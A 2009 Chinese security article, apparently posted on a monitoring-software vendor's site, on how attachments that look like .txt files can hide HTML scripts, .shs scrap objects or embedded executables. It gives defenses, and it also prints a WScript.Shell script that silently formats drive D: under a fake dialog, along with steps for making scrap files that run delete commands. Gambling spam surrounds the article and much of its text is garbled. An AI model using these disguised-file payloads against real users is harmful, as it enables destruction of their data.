青海快三53期开奖结果
TXT文本也危险
[时间:2009-12-08]  [文章来源:上海百络]  [责任编辑:master]
    假如您收到的邮件附件中有一个看起来是这样的文件:QQ 放送.txt,您是不是认为它肯定是纯文本文件?我要告诉您,不一定!它的?#23548;?#25991;件名可以是QQ 放送.txt{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并不会显现出来,您看到的就是个.txt文件,这个文件?#23548;?#19978;等同于QQ 放送.txt.html.那么直接打开这个文件为什么有危险呢?请看如果这个文件的内容如下: 
          <script> 
      a=new ActiveXObject("WSCript.Shell"); 
      a.run("format.com d:/q /autotest /u"); 
      alert("Windows is configuring the system. Please do not interrupt this process."); 
      </script>   
          您可能以为它会调用记事本来运行,可是如果您双击它,结果它却调用了HTML来运行,并且自动在后台开始格式化D盘,同时显示“Windows正在配置系统。Plase不打?#38505;?#20010;过程。”这样一个对话框来欺骗您。您看随意打开附件中的.txt的危险够大了吧?

      欺骗实现原理:当您双击这个伪装起来的。txt时候,由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B},也就是.html文件,于是就会以html文件的?#38382;?#36816;行,这是它能运行起来的先决条件。

      文件内容中的第2和第3行是它能够产生破坏作用的关键所在。其中第3行是破坏行动的执行者,在其中可以加载带有破坏性质的命令。那么第 2行又是干什么的呢?您可能已经注意到了第 2行里的“Ws cript?#20445;?#23545;!就是它导演了全幕,它是幕后主谋!

      Ws cript全称Windows s cripting主人,它是Win98?#34892;录?#36827;的功能,是一种批次语言/自动执行工具——它所对应的程序“Ws cript.exe”是一个脚本语言解?#25512;鰨?#20301;于c:\WINDOWS下,正是它使得脚本可?#21592;?#25191;行,就象执?#20449;?#22788;理一样。在Windowss cripting主人脚本环境里,预定义了一些对象,通过它?#28304;?#30340;几个内置对象,可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。

      一 识别及防范方法:

      ①这?#25191;?#26377;欺骗性质的.txt文件显示出来的并不是文本文件的图标,它显示的是未定义文件类型的标志,这是区分它与正常TXT文件的最好方法。

      ②识别的另一个办法是在“按网页方式”查看时在“我的电脑”左面会显示出其文件名全称,此时可以看到它不是真正的TXT文件。问题是很多初学者经验不够,老手也可能因为没留意而打开它,在这里再次提醒您,注意您收到的邮件中附件的文件名,不仅要看显示出来的扩展名,还要注意其?#23548;?#26174;示的图标是什么。

      ③对于附件中别人发来的看起来是TXT的文件,可以将它下载后用鼠标右键选择“用记事本打开?#20445;?#36825;样看会很安全。

      二 恶意碎片文件

      另一类可怕的TXT文件是一种在Windows中被称作“碎片对象”(扩展名为“shs”)的文件,它一般被伪装成文本文件通过电子邮件附件来传播,比方说,这个样子:QQ号码放送。txt.shs,由于真正地后缀名“嘘”不会显示出来,如果在该文件中含有诸如“format”之类的命令将非常可怕!不仅如此,以下四点原因也是其有一定危害性的原因:

      ①碎片对象文件的缺省图标是一个和记事本文件图标相类似的图标,很容易会被误认为是一些文本的文档,用户对它的警惕心理准备不足。

      ②在Windows的默认状态下,“碎片对象”文件的扩展名(“.shs”)是隐藏的,即使你在?#30333;试?#31649;理器”→“工具”→“文件?#37266;?#39033;”→?#23433;?#30475;”中,?#36873;?#38544;藏已知文件类型的扩展名”前面的?#21834;獺比?#25481;,“.嘘”也还是隐藏的,这是因为Windows支持双重扩展名,如“QQ号码放送.txt.shs”显示出来的名称永远是“QQ号码放送.txt”。

      ③即使有疑心,你用任何杀毒软件都不会?#19994;?#36825;个文件的一点问题,因为这个文件本身就没有病毒,也不是可执行的,而?#19968;?#26159;系统文件。你会怀疑这样的文件吗?

      ④这?#20013;?#38468;件病?#23616;?#36896;起来非常容易,5分钟就可以学会,也不需要编程知识(格式化C盘的命令:“format c:”大家都知道吧。

      1、 具体实例

      那么,碎片对象到底对用户的计算机会造成什么威胁呢?我们一起来作个测试就明白了。以下测试环境是在Windows 2000服务器中文版上进行的。我们先在?#25165;?#19978;创建一个测试用的文件test.txt(我创建的位置是D:\test.txt),然后我们来制作一个能?#22659;?#36825;个测试文件的碎片对象文件。

      ①先运行一个对象包装程序(packager.exe),我的Win2000服务者安装在/winnt/system32下。

      ②新建一个文件后,打开?#35828;ァ?#25991;件”→“导入?#20445;?#36825;时会弹出一个文件对话框,让你选择一个文件。不用考虑,随便选择一个文件就可以了。

      ③然后打开“编辑”→“命令行?#20445;?#22312;弹出的命令行输入对话框中输入“cmd.exe /c del d:\test.txt?#20445;?#28857;“?#33539;ā薄?

      ④然后,在?#35828;?#20013;选择“编辑”→?#26696;?#21046;数据包”。

      ⑤接着,随便在?#25165;躺险?#20010;地方,我就直接在桌面上了。在桌面上点击鼠标右键,在弹出?#35828;?#20013;选择“?#31243;保?#36825;时我们可以看到在桌面创建了一个碎片对象文件。

      现在我们可以双击一下这个文件,CMD窗口一闪而过后,再到D盘看看,测试文件D:\test.txt已经被?#22659;?#20102;!现在你该知道了,当时在对象包装中输入地命令被执行了。好危险啊,如果这条命令是要?#22659;?#31995;统中的一个重要文件,或者是格式化命令?#38382;?#20043;类的危险命令,那该有多么的可怕!

      下面让我们一起来看看这个“隐身杀手”的真正面目吧!

          2、 技术原理 

      依照微软的解释,嘘文件是一类特殊的对象链接与嵌入(对象链接与嵌入,对象连接和嵌入)对象,可以由词文档或优秀电子表格创建。通过选择文档中文本或图像的一块区域,然后拖放?#20204;?#22495;到桌面上的某处,就可?#28304;?#24314;一个Windows碎片对象,或称为嘘文件(此文件是不可读文件)。但是你可以用任何其它你想要的文件名重新命名嘘文件,或者拖放嘘对象到另一个文档(同样地,你可以剪切和?#31243;?。

      也就是说,我们所输入的命令作为对象链接与嵌入对象嵌入到对象包装程序新建的文件中了, 而微软为了能方便的将嵌入到文件的对象进行复制,使用了一种技术壳废料宾语(简称嘘),就是说,当你在不同文件间复制对象?#20445;琖indows是将对象包装成一个碎片对象来进行复制的。因此,一旦我们不是在文件间进行复制?#31243;?#32780;是直接将碎片对象?#31243;?#21040;?#25165;?#19978;,就会产生一个。嘘文件。这个碎片对象文件保存了原来对象的所具备的功能,原来对象包含的命令同样会被解析执行,这正是其可怕这处!

      3、防范方法

      (1)“野蛮”法

      嘘文件?#28909;?#19981;是可执行文件,当然需要其他的程序来解析执行了,我们去掉解析执行的关联就可以简单防止这种文件中潜伏的威胁了。 运行注册表编辑器regedit.exe,在HKEY_CLASSES_ROOT\.shs主键下,将默认值ShellScrap?#22659;?#29616;在双击。嘘文件,看,不会执行了吧?弹出了一个对话框,让我们选择打开。嘘文件需要的程序,此时你选择“记事本”程序看?#22836;?#24120;安全了。 更彻底一点的办法是将HKEY_CLASSES_ROOT\ShellScrap\shell\open\command下的打开。嘘文件的关联完全去掉,现在双击。嘘文件,连选择运行程序的对话框也不出现了,它会直接要求在控制面板重建文件关联。

      (2)“文明”法

      ①在注册表编辑器HEY_CLASSES_ROOT\ShellScrap键下,有一个键值“NeverShowExt?#20445;?#23427;是导致?#21834;?#22040;”文件扩展名无法显示的罪魁祸首。?#22659;?#36825;个键值,你就可以看到?#21834;?#22040;”扩展名了。

      ②更换“碎片对象”文件的默认图标。由于碎片对象文件的默认图标与文本文件图标非常相似,容易麻痹人,所以我们要更换它的图标。打开?#35797;?#31649;理器,选中?#23433;?#30475;”?#35828;?#19979;的“文件?#37266;?#26694;?#20445;?#22312;弹出的对话框中选择“文件类型”标签,在“已注册的文件类型”下?#19994;健?#30862;片对象”。单击右上角“编辑”按钮,在打开的“编辑文件类型” 对话框中单击上边的?#26696;?#25913;图标”按钮。打开C:\WINDOWS\SYSTEM\Pifmgr.dll,从出现的图标中选一个作为?#21834;?#22040;”文件的新图标即可。

      (3)更多防?#38382;?#27573;

      ①如果是病毒文件隐藏了其真实扩展名“嘘?#20445;?#32780;你在反病毒软件中设置成扫描指定程序文件、而不是扫描所有文件(如只扫描可执行文件),那么反病毒软件是无法发现病毒的,所以请在反病毒软件的指定程序文件中加入?#21834;?#22040;”文件的扫描。各种防病毒软件的设置大同小异,比较简单,请大家自?#33322;?#34892;设置。

      ②禁止“碎片对象”文件及“指向文档的快捷方式”文件。

      三 改头换面的?#21491;?#37038;件附件

      除了上面所说的两类危险的“TXT”文件,还存在另一种危险的“TXT”文件——改头换面的?#21491;?#37038;件附件!即一个看起来是TXT的文件其实是个EXE文件!下面我以OutLook2000简体中文版为例进行详细?#24471;鰲?

      1. 开启OutLook2000,新建一个邮件,选择?#35828;?#26639;中的?#26696;?#24335;”→“带格式文本?#20445;?#22312;邮件正文点击一下鼠标左键,选择?#35828;ァ安?#20837;”→“对象?#20445;?#28857;击“由文件创建”→“浏览?#20445;?#36873;择Windows目录下的notepad.exe,点击“?#33539;ā保?#22312;新邮件的主体部分出现notepad.exe及其图标。

      2. 在刚出现的notepad.exe及其图标上点击鼠标右键,选择“编辑包?#20445;?#25171;开对象包装程序,选择?#23433;?#20837;图标”按钮,选择“浏览?#20445;?#36873;择WINDOWS\SYSTEM\SHELL32.DLL,在当前图标框中选择一个你想要的图标,比方说选择一个文本文件的图标,然后按“?#33539;ā薄?#28982;后选择?#35828;ァ?#32534;辑”→“卷标?#20445;我?#23450;义一个名字,比方说hello.txt,点击“?#33539;ā薄?

      3. 退出对象包装程序,在提示是否更新时选择“是”。

      4. 好,现在出现在面前的是hello.txt,一般人会认为它是一个地地道道的文本文件附件,相信没有人怀疑它是别的东西。请你双击这个图表,看看会发生什么?是不是发现它打开的是notepad.exe!如果它是一个病毒文件,结果?#19978;?#32780;知!

      事实上,当你用OutLook2000收到这样一个邮件?#20445;?#23427;会显示这是一个带附件的邮件,当你以为它是一个文本文件附件双击打开?#20445;右?#20250;提示:部分对象携带病毒,可能对你的计算机造成危害,因此,请确保该对象来源可*.是否相信?#20204;?#20837;对象?安全观念强的人一般会选择?#23433;弧?这就对了),一般的人可能会选择是(你惨了!)。

      识别方法:不要怕,尽管它的迷惑性极大,但是仍然会露出一些马脚:

      1. 它其实是一个对象链接与嵌入对象,并不是附件,选择它?#20445;?#36873;择框会不同于选择附件的选择框。点鼠标右键出现的?#35828;?#19981;同。

      2. 双击打开它?#20445;?#23433;全提示与附件的安全提示不同,这点非常重要。这?#20445;?#24212;该选择?#23433;弧保?#28982;后点击鼠标右键,选择“编辑包?#20445;?#25552;示是否信任该对象时选择“是?#20445;?#22312;对象包装程序的右边内容框中,将现出原形。在本例中,会显示“NOTEPAD.EXE的备份?#20445;?#25991;件是否可执行,关键在这里。

      3. 因为它不是附件,在选择“文件”→“保存附件”时并无对话框出现。

      4. 由于并不是所有的邮件收发软件都支持对象嵌入,所以这类邮件的格式不一定被某些软件识别,如OutLook Express.但是?#21491;?#30340;使用面很广,尤其是在比较大的、有自己邮件服务器的公司,所以还是有必要提醒大家小心嵌入对象,不光是?#21491;埃?#20854;实?#30465;?#20248;秀等支持嵌入对象的软件可以?#20204;?#20837;对象改头换面以迷惑人

    [关闭本页]
  关键词:  TXT文本也危险
首页 |  局域网监控软件 |  局域网管理软件 |  流量监控软件 |  百络网警用户论坛
Copyright © 2013-2016 NETBAI.COM 上海百络信息技术有限公司 版权所有 E-MAIL:[email protected]
监控软件-征信网认证 监控软件-网警网络110 沪ICP备14015905号-1
监控软件-公安部检测报告 监控软件-360认证 监控软件-瑞星认证 监控软件-金山云安全?#34892;?#32593;站安全检测 监控软件-江民安全认证 监控软件-卡?#36864;够?#26816;测通过 监控软件-小红伞安全认证 青海快三53期开奖结果
11选5前一稳赚投注 北京pk10技巧规律9码 澳洲5分彩 开奖 重庆时时免费计划软件app 一分钟赛车计划网 北京pk赛车超准计划 北京pk赛车搞假吗 刮刮乐2元一整包中奖率 双色球投注调查 幸运28稳赚投注技巧